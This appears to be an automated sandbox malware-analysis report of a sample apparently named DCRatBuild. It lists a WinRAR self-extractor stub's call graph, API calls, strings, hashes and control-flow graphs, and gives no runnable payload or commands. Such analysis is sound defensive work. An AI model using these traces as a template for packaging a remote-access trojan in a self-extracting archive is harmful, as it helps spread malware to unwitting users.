f1f267 22983->22985 23001 f1f22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22985->23001 22987 f1f34a 22987->22976 22988->22969 22989->22973 22991 f23df3 22990->22991 22997 f2388f 22990->22997 22991->22997 23002 f28fa5 GetLastError 22991->23002 22993 f23e14 23023 f290fa 38 API calls __fassign 22993->23023 22995 f23e2d 23024 f29127 38 API calls __fassign 22995->23024 22998 f23da1 20 API calls 2 library calls 22997->22998 22998->22977 22999->22979 23000->22973 23001->22987 23003 f28fc7 23002->23003 23004 f28fbb 23002->23004 23026 f285a9 20 API calls 2 library calls 23003->23026 23025 f2a61b 11 API calls 2 library calls 23004->23025 23007 f28fc1 23007->23003 23009 f29010 SetLastError 23007->23009 23008 f28fd3 23015 f28fdb 23008->23015 23033 f2a671 11 API calls 2 library calls 23008->23033 23009->22993 23012 f28ff0 23014 f28ff7 23012->23014 23012->23015 23013 f28fe1 23017 f2901c SetLastError 23013->23017 23034 f28e16 20 API calls __dosmaperr 23014->23034 23027 f284de 23015->23027 23035 f28566 38 API calls _abort 23017->23035 23018 f29002 23020 f284de _free 20 API calls 23018->23020 23022 f29009 23020->23022 23022->23009 23022->23017 23023->22995 23024->22997 23025->23007 23026->23008 23028 f28512 __dosmaperr 23027->23028 23029 f284e9 RtlFreeHeap 23027->23029 23028->23013 23029->23028 23030 f284fe 23029->23030 23036 f2895a 20 API calls __dosmaperr 23030->23036 23032 f28504 GetLastError 23032->23028 23033->23012 23034->23018 23036->23032 24903 f01075 82 API calls pre_c_initialization 24904 f15c77 121 API calls __vswprintf_c_l 24906 f1fc60 51 API calls 2 library calls 24908 f23460 RtlUnwind 24909 f29c60 71 API calls _free 24910 f29e60 31 API calls 2 library calls 24948 f19b50 GdipDisposeImage GdipFree __except_handler4 24914 f28050 8 API calls ___vcrt_uninitialize 24656 f09b59 24657 f09bd7 24656->24657 24660 f09b63 24656->24660 24658 f09bad SetFilePointer 24658->24657 24659 f09bcd GetLastError 24658->24659 24659->24657 24660->24658 24950 f1be49 98 API calls 3 library calls 24915 f1ec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24916 f18c40 GetClientRect 24917 f23040 5 API calls 2 library calls 24918 f30040 IsProcessorFeaturePresent 24951 f1d34e DialogBoxParamW 24920 f1a430 72 API calls 24954 f1be49 103 API calls 4 library calls 24921 f01025 29 API calls pre_c_initialization 24743 f09f2f 24744 f09f44 24743->24744 24745 f09f3d 24743->24745 24746 f09f4a GetStdHandle 24744->24746 24750 f09f55 24744->24750 24746->24750 24747 f09fa9 WriteFile 24747->24750 24748 f09f7a 24749 f09f7c WriteFile 24748->24749 24748->24750 24749->24748 24749->24750 24750->24745 24750->24747 24750->24748 24750->24749 24752 f0a031 24750->24752 24754 f06e18 60 API calls 24750->24754 24755 f07061 75 API calls 24752->24755 24754->24750 24755->24745 24959 f06110 80 API calls 24960 f2b710 GetProcessHeap 24961 f2a918 27 API calls 3 library calls 24962 f1be49 108 API calls 4 library calls 24769 f1ea00 24770 f1ea08 pre_c_initialization 24769->24770 24787 f28292 24770->24787 24772 f1ea13 pre_c_initialization 24794 f1e600 24772->24794 24774 f1ea9c 24802 f1ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 24774->24802 24776 f1eaa3 ___scrt_initialize_default_local_stdio_options 24777 f1ea28 __RTC_Initialize 24777->24774 24778 f1e7a1 pre_c_initialization 29 API calls 24777->24778 24779 f1ea41 pre_c_initialization 24778->24779 24779->24774 24780 f1ea52 24779->24780 24799 f1f15b InitializeSListHead 24780->24799 24782 f1ea57 pre_c_initialization __except_handler4 24800 f1f167 30 API calls 2 library calls 24782->24800 24784 f1ea7a pre_c_initialization 24801 f28332 38 API calls 3 library calls 24784->24801 24786 f1ea85 pre_c_initialization 24788 f282a1 24787->24788 24789 f282c4 24787->24789 24788->24789 24803 f2895a 20 API calls __dosmaperr 24788->24803 24789->24772 24791 f282b4 24804 f28839 26 API calls pre_c_initialization 24791->24804 24793 f282bf 24793->24772 24795 f1e613 ___scrt_initialize_onexit_tables 24794->24795 24796 f1e60e 24794->24796 24795->24777 24796->24795 24805 f1ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 24796->24805 24798 f1e696 24799->24782 24800->24784 24801->24786 24802->24776 24803->24791 24804->24793 24805->24798 24963 f01f05 126 API calls __EH_prolog 24922 f1ec0b 28 API calls 2 library calls 24965 f1db0b 19 API calls ___delayLoadHelper2@8 24811 f1c40e 24812 f1c4c7 24811->24812 24820 f1c42c _wcschr 24811->24820 24815 f1c4e5 24812->24815 24826 f1be49 _wcsrchr 24812->24826 24846 f1ce22 24812->24846 24813 f1aa36 ExpandEnvironmentStringsW 24813->24826 24816 f1ce22 18 API calls 24815->24816 24815->24826 24816->24826 24817 f1ca8d 24818 f117ac CompareStringW 24818->24820 24820->24812 24820->24818 24821 f1c11d SetWindowTextW 24821->24826 24824 f235de 22 API calls 24824->24826 24826->24813 24826->24817 24826->24821 24826->24824 24827 f1bf0b SetFileAttributesW 24826->24827 24832 f1c2e7 GetDlgItem SetWindowTextW SendMessageW 24826->24832 24835 f1c327 SendMessageW 24826->24835 24840 f117ac CompareStringW 24826->24840 24841 f19da4 GetCurrentDirectoryW 24826->24841 24843 f0a52a 7 API calls 24826->24843 24844 f0a4b3 FindClose 24826->24844 24845 f1ab9a 76 API calls new 24826->24845 24829 f1bfc5 GetFileAttributesW 24827->24829 24839 f1bf25 ___scrt_fastfail 24827->24839 24829->24826 24831 f1bfd7 DeleteFileW 24829->24831 24831->24826 24833 f1bfe8 24831->24833 24832->24826 24834 f0400a _swprintf 51 API calls 24833->24834 24836 f1c008 GetFileAttributesW 24834->24836 24835->24826 24836->24833 24837 f1c01d MoveFileW 24836->24837 24837->24826 24838 f1c035 MoveFileExW 24837->24838 24838->24826 24839->24826 24839->24829 24842 f0b4f7 52 API calls 2 library calls 24839->24842 24840->24826 24841->24826 24842->24839 24843->24826 24844->24826 24845->24826 24848 f1ce2c ___scrt_fastfail 24846->24848 24847 f1d08a 24847->24815 24848->24847 24849 f1cf1b 24848->24849 24869 f117ac CompareStringW 24848->24869 24850 f0a180 4 API calls 24849->24850 24852 f1cf30 24850->24852 24853 f1cf4f ShellExecuteExW 24852->24853 24870 f0b239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 24852->24870 24853->24847 24855 f1cf62 24853->24855 24857 f1cff1 CloseHandle 24855->24857 24858 f1cf9b 24855->24858 24863 f1cf91 ShowWindow 24855->24863 24856 f1cf47 24856->24853 24859 f1cfff 24857->24859 24860 f1d00a 24857->24860 24871 f1d2e6 6 API calls 24858->24871 24872 f117ac CompareStringW 24859->24872 24860->24847 24865 f1d081 ShowWindow 24860->24865 24863->24858 24864 f1cfb3 24864->24857 24866 f1cfc6 GetExitCodeProcess 24864->24866 24865->24847 24866->24857 24867 f1cfd9 24866->24867 24867->24857 24869->24849 24870->24856 24871->24864 24872->24860

                                      Executed Functions

                                      Function 00F1D5D4 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197filesleeptimeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00F100CF: GetModuleHandleW.KERNEL32(kernel32), ref: 00F100E4
                                        • Part of subcall function 00F100CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00F100F6
                                        • Part of subcall function 00F100CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00F10127
                                        • Part of subcall function 00F19DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00F19DAC
                                        • Part of subcall function 00F1A335: OleInitialize.OLE32(00000000), ref: 00F1A34E
                                        • Part of subcall function 00F1A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00F1A385
                                        • Part of subcall function 00F1A335: SHGetMalloc.SHELL32(00F48430), ref: 00F1A38F
                                        • Part of subcall function 00F113B3: GetCPInfo.KERNEL32(00000000,?), ref: 00F113C4
                                        • Part of subcall function 00F113B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 00F113D8
                                      • GetCommandLineW.KERNEL32 ref: 00F1D61C
                                      • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00F1D643
                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00F1D654
                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 00F1D68E
                                        • Part of subcall function 00F1D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00F1D29D
                                        • Part of subcall function 00F1D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00F1D2D9
                                      • CloseHandle.KERNEL32(00000000), ref: 00F1D697
                                      • GetModuleFileNameW.KERNEL32(00000000,00F5DC90,00000800), ref: 00F1D6B2
                                      • SetEnvironmentVariableW.KERNEL32(sfxname,00F5DC90), ref: 00F1D6BE
                                      • GetLocalTime.KERNEL32(?), ref: 00F1D6C9
                                      • _swprintf.LIBCMT ref: 00F1D708
                                      • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00F1D71A
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00F1D721
                                      • LoadIconW.USER32(00000000,00000064), ref: 00F1D738
                                      • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 00F1D789
                                      • Sleep.KERNEL32(?), ref: 00F1D7B7
                                      • DeleteObject.GDI32 ref: 00F1D7F0
                                      • DeleteObject.GDI32(?), ref: 00F1D800
                                      • CloseHandle.KERNEL32 ref: 00F1D843
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                      • API String ID: 788466649-2079648372
                                      • Opcode ID: bbedeae86f9acb35b5ec83bd83a6b367c4912fc59e8c7279b72509be3cbf8f92
                                      • Instruction ID: 114399863a4e1c88d201f17a21c3a40fe21436bb4ef5b70ae6d0d62b608823a6
                                      • Opcode Fuzzy Hash: bbedeae86f9acb35b5ec83bd83a6b367c4912fc59e8c7279b72509be3cbf8f92
                                      • Instruction Fuzzy Hash: 8461F471900349AFD320EFA5EC49BAB37A8AB45765F000428F945D31A2DFB8D984F762
                                      Function 00F19E1C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100memorywindowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 770 f19e1c-f19e38 FindResourceW 771 f19f2f-f19f32 770->771 772 f19e3e-f19e50 SizeofResource 770->772 773 f19e70-f19e72 772->773 774 f19e52-f19e61 LoadResource 772->774 776 f19f2e 773->776 774->773 775 f19e63-f19e6e LockResource 774->775 775->773 777 f19e77-f19e8c GlobalAlloc 775->777 776->771 778 f19e92-f19e9b GlobalLock 777->778 779 f19f28-f19f2d 777->779 780 f19f21-f19f22 GlobalFree 778->780 781 f19ea1-f19ebf call f1f4b0 778->781 779->776 780->779 785 f19ec1-f19ee3 call f19d7b 781->785 786 f19f1a-f19f1b GlobalUnlock 781->786 785->786 791 f19ee5-f19eed 785->791 786->780 792 f19f08-f19f16 791->792 793 f19eef-f19f03 GdipCreateHBITMAPFromBitmap 791->793 792->786 793->792 794 f19f05 793->794 794->792
                                      APIs
                                      • FindResourceW.KERNEL32(00F1AE4D,PNG,?,?,?,00F1AE4D,00000066), ref: 00F19E2E
                                      • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00F1AE4D,00000066), ref: 00F19E46
                                      • LoadResource.KERNEL32(00000000,?,?,?,00F1AE4D,00000066), ref: 00F19E59
                                      • LockResource.KERNEL32(00000000,?,?,?,00F1AE4D,00000066), ref: 00F19E64
                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00F1AE4D,00000066), ref: 00F19E82
                                      • GlobalLock.KERNEL32(00000000,?,?,?,?,?,00F1AE4D,00000066), ref: 00F19E93
                                      • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00F19EFC
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00F19F1B
                                      • GlobalFree.KERNEL32(00000000), ref: 00F19F22
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                                      • String ID: PNG
                                      • API String ID: 4097654274-364855578
                                      • Opcode ID: 98f25d6891fa3d4ead3704fceaab53b8144e8f034cd52d8f65cfa13baf48a297
                                      • Instruction ID: 52d6bc2f071382d3249a29b90f105e3805631a4dc4b5982a394d3061b09ca9ae
                                      • Opcode Fuzzy Hash: 98f25d6891fa3d4ead3704fceaab53b8144e8f034cd52d8f65cfa13baf48a297
                                      • Instruction Fuzzy Hash: D0318175A0830AABC7109F21EC5895BBBAAFF85771B040528F906D3260DBB5DC41ABA1
                                      Function 00F0A5F4 Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 976 f0a5f4-f0a61f call f1e360 979 f0a691-f0a69a FindNextFileW 976->979 980 f0a621-f0a632 FindFirstFileW 976->980 981 f0a6b0-f0a6b2 979->981 982 f0a69c-f0a6aa GetLastError 979->982 983 f0a6b8-f0a75c call f0fe56 call f0bcfb call f10e19 * 3 980->983 984 f0a638-f0a64f call f0b66c 980->984 981->983 985 f0a761-f0a774 981->985 982->981 983->985 991 f0a651-f0a668 FindFirstFileW 984->991 992 f0a66a-f0a673 GetLastError 984->992 991->983 991->992 994 f0a684 992->994 995 f0a675-f0a678 992->995 998 f0a686-f0a68c 994->998 995->994 997 f0a67a-f0a67d 995->997 997->994 1000 f0a67f-f0a682 997->1000 998->985 1000->998
                                      APIs
                                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00F0A4EF,000000FF,?,?), ref: 00F0A628
                                      • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00F0A4EF,000000FF,?,?), ref: 00F0A65E
                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00F0A4EF,000000FF,?,?), ref: 00F0A66A
                                      • FindNextFileW.KERNEL32(?,?,?,?,?,?,00F0A4EF,000000FF,?,?), ref: 00F0A692
                                      • GetLastError.KERNEL32(?,?,?,?,00F0A4EF,000000FF,?,?), ref: 00F0A69E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: FileFind$ErrorFirstLast$Next
                                      • String ID:
                                      • API String ID: 869497890-0
                                      • Opcode ID: 5e6ec898f9a5610fcfd8779f4e911a073143673126cf727036439dc3e20406f0
                                      • Instruction ID: 3e5572a5a53b6134d029ee3206ce4f74a028004bdb3c15fca141d95eeff54dab
                                      • Opcode Fuzzy Hash: 5e6ec898f9a5610fcfd8779f4e911a073143673126cf727036439dc3e20406f0
                                      • Instruction Fuzzy Hash: 82419372504345AFC724EF68C884ADAF7F8FF48354F040A2AF5D9D3240D775A994AB92
                                      Function 00F2753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,?,00F27513,00000000,00F3BAD8,0000000C,00F2766A,00000000,00000002,00000000), ref: 00F2755E
                                      • TerminateProcess.KERNEL32(00000000,?,00F27513,00000000,00F3BAD8,0000000C,00F2766A,00000000,00000002,00000000), ref: 00F27565
                                      • ExitProcess.KERNEL32 ref: 00F27577
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: f23ce053c999cc082b7d102dac21c67a29a649cdc6e508d569c3aac76be89357
                                      • Instruction ID: ba3976ad52a76acf349c541a43104b7b93b259d6c3eee60f3e3678b012fca717
                                      • Opcode Fuzzy Hash: f23ce053c999cc082b7d102dac21c67a29a649cdc6e508d569c3aac76be89357
                                      • Instruction Fuzzy Hash: 93E0EC31404A58EFCF11FF64ED0AA4A7F6AEF40765F148414F9058A232CB39DE42EB50
                                      Function 00F0857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: H_prolog_memcmp
                                      • String ID:
                                      • API String ID: 3004599000-0
                                      • Opcode ID: 8c1d77c2f7ea80a223e2da100cda5ca2c4db1f2c24288a9cde44a3c6d9a3bf51
                                      • Instruction ID: d6f3f456eece3cdeb66aed8020a6dcc5b5f2722349b061c8aef94a3a74adbe81
                                      • Opcode Fuzzy Hash: 8c1d77c2f7ea80a223e2da100cda5ca2c4db1f2c24288a9cde44a3c6d9a3bf51
                                      • Instruction Fuzzy Hash: 0E823A70D04245AEDF25DB70C881BFABBA9AF05350F0841B9DC999B1C3DB745A4AFB60
                                      Function 00F1AEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F1AEE5
                                        • Part of subcall function 00F0130B: GetDlgItem.USER32(00000000,00003021), ref: 00F0134F
                                        • Part of subcall function 00F0130B: SetWindowTextW.USER32(00000000,00F335B4), ref: 00F01365
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: H_prologItemTextWindow
                                      • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                      • API String ID: 810644672-3344487560
                                      • Opcode ID: 7cd337466fd58e257416e6cdb4b5971cd26db56301137b9210b2cc4fc1c81dd8
                                      • Instruction ID: f55f5f0454e8865ad6ca4c5c8a599bf4a50d2817666cc541c2057bf455368b34
                                      • Opcode Fuzzy Hash: 7cd337466fd58e257416e6cdb4b5971cd26db56301137b9210b2cc4fc1c81dd8
                                      • Instruction Fuzzy Hash: 8242E671D44258FEEB21EBA09C8AFEE7B7CAB12751F000054F601A61E1CBB94985FB61
                                      Function 00F100CF Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317libraryfileloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 257 f100cf-f100ee call f1e360 GetModuleHandleW 260 f100f0-f10107 GetProcAddress 257->260 261 f10154-f103b2 257->261 264 f10121-f10131 GetProcAddress 260->264 265 f10109-f1011f 260->265 262 f10484-f104b3 GetModuleFileNameW call f0bc85 call f0fe56 261->262 263 f103b8-f103c3 call f270dd 261->263 279 f104b5-f104bf call f0acf5 262->279 263->262 274 f103c9-f103fa GetModuleFileNameW CreateFileW 263->274 264->261 266 f10133-f10152 264->266 265->264 266->261 276 f10478-f1047f CloseHandle 274->276 277 f103fc-f1040a SetFilePointer 274->277 276->262 277->276 280 f1040c-f10429 ReadFile 277->280 286 f104c1-f104c5 call f10085 279->286 287 f104cc 279->287 280->276 282 f1042b-f10450 280->282 284 f1046d-f10476 call f0fbd8 282->284 284->276 294 f10452-f1046c call f10085 284->294 291 f104ca 286->291 288 f104ce-f104d0 287->288 292 f104f2-f10518 call f0bcfb GetFileAttributesW 288->292 293 f104d2-f104f0 CompareStringW 288->293 291->288 296 f1051a-f1051e 292->296 301 f10522 292->301 293->292 293->296 294->284 296->279 300 f10520 296->300 302 f10526-f10528 300->302 301->302 303 f10560-f10562 302->303 304 f1052a 302->304 305 f10568-f1057f call f0bccf call f0acf5 303->305 306 f1066f-f10679 303->306 307 f1052c-f10552 call f0bcfb GetFileAttributesW 304->307 317 f10581-f105e2 call f10085 * 2 call f0ddd1 call f0400a call f0ddd1 call f19f35 305->317 318 f105e7-f1061a call f0400a AllocConsole 305->318 313 f10554-f10558 307->313 314 f1055c 307->314 313->307 315 f1055a 313->315 314->303 315->303 323 f10667-f10669 ExitProcess 317->323 318->323 324 f1061c-f10661 GetCurrentProcessId AttachConsole call f235b3 GetStdHandle WriteConsoleW Sleep FreeConsole 318->324 324->323
                                      APIs
                                      • GetModuleHandleW.KERNEL32(kernel32), ref: 00F100E4
                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00F100F6
                                      • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00F10127
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F103D4
                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F103F0
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F10402
                                      • ReadFile.KERNEL32(00000000,?,00007FFE,00F33BA4,00000000), ref: 00F10421
                                      • CloseHandle.KERNEL32(00000000), ref: 00F10479
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F1048F
                                      • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00F104E7
                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00F10510
                                      • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00F1054A
                                        • Part of subcall function 00F10085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F100A0
                                        • Part of subcall function 00F10085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F0EB86,Crypt32.dll,00000000,00F0EC0A,?,?,00F0EBEC,?,?,?), ref: 00F100C2
                                      • _swprintf.LIBCMT ref: 00F105BE
                                      • _swprintf.LIBCMT ref: 00F1060A
                                        • Part of subcall function 00F0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F0401D
                                      • AllocConsole.KERNEL32 ref: 00F10612
                                      • GetCurrentProcessId.KERNEL32 ref: 00F1061C
                                      • AttachConsole.KERNEL32(00000000), ref: 00F10623
                                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00F10649
                                      • WriteConsoleW.KERNEL32(00000000), ref: 00F10650
                                      • Sleep.KERNEL32(00002710), ref: 00F1065B
                                      • FreeConsole.KERNEL32 ref: 00F10661
                                      • ExitProcess.KERNEL32 ref: 00F10669
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                      • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                      • API String ID: 1201351596-3298887752
                                      • Opcode ID: 8893180b2166dd09caffb0ba2fd1e06502f24370eed192ca1d6b42d21c876a15
                                      • Instruction ID: 3dee5d5334a22a33c1015fae0b261ba228396550efae44b8dfdc71f56887f3c0
